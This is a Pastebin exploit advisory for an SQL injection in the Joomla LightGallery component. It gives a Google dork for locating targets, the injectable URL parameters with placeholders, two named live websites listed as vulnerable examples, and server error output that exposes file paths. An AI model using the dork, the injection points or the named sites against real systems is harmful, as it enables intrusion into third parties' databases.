Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################################################
- # Exploit Title : Joomla LightGallery Components 1.2.1 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : joompolitan.com
- # Software Download Link : joompolitan.com/lightgallery.html
- joompolitan.com/joomla/free/lightgallery_plugin.2.0.3.zip
- # Software Information Link : extensions.joomla.org/extension/light-gallery/
- tutorial.joompolitan.com/light-gallery-for-joomla.html
- # Software Affected Versions : Joomla Component 1.2.1 and Joomla Plugin 2.0.3
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_lightgallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- #########################################################################
- # Description about Software :
- ***************************
- Light Gallery Component for Joomla provides a simplest way for you to create
- responsive galleries in your website. It can generate a gallery from your folder.
- Therefore, you don't have headache problem to insert the pictures one by one.
- Light Photo Gallery also allows you to create gallery by using pictures or images
- from other website. Light Gallery enables all features of light box and it will be viewed in light box.
- Light Gallery Joomla component is compatible with Joomla 2.5.x, Joomla 3.x and later.
- ###########################################################################
- # Impact :
- ***********
- Joomla LightGallery 2.03 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- #########################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_lightgallery&view=category&Itemid=[SQL Injection]
- /index.php?option=com_lightgallery&view=list&cid=[ID-NUMBER]&Itemid=[SQL Injection]
- #########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] vmro-dp.org.mk/index.php?option=com_lightgallery&view=category&Itemid=79
- [+] ttlawcourts.org/index.php?option=com_lightgallery&view=list&cid=24&Itemid=202
- #########################################################################
- # Example SQL Database Error :
- *****************************
- Warning: Invalid argument supplied for foreach() in
- /home/vmrodp24/public_html/components/com_lightgallery
- /views/category/tmpl/default.php on line 16
- Error loading component: com_lightgallery, 1
- Warning: getimagesize(/administrator/components/com_lightgallery
- /lightgallery/th37ce8443-0666-eea9-72b7-000016100028_cj tours lands.jpg)
- [function.getimagesize]: failed to open stream: No such file or directory in
- C:\XAMPP\xampp\htdocs\components\com_lightgallery
- \views\list\tmpl\default.php on line 57
- #########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #########################################################################
Add Comment
Please, Sign In to add comment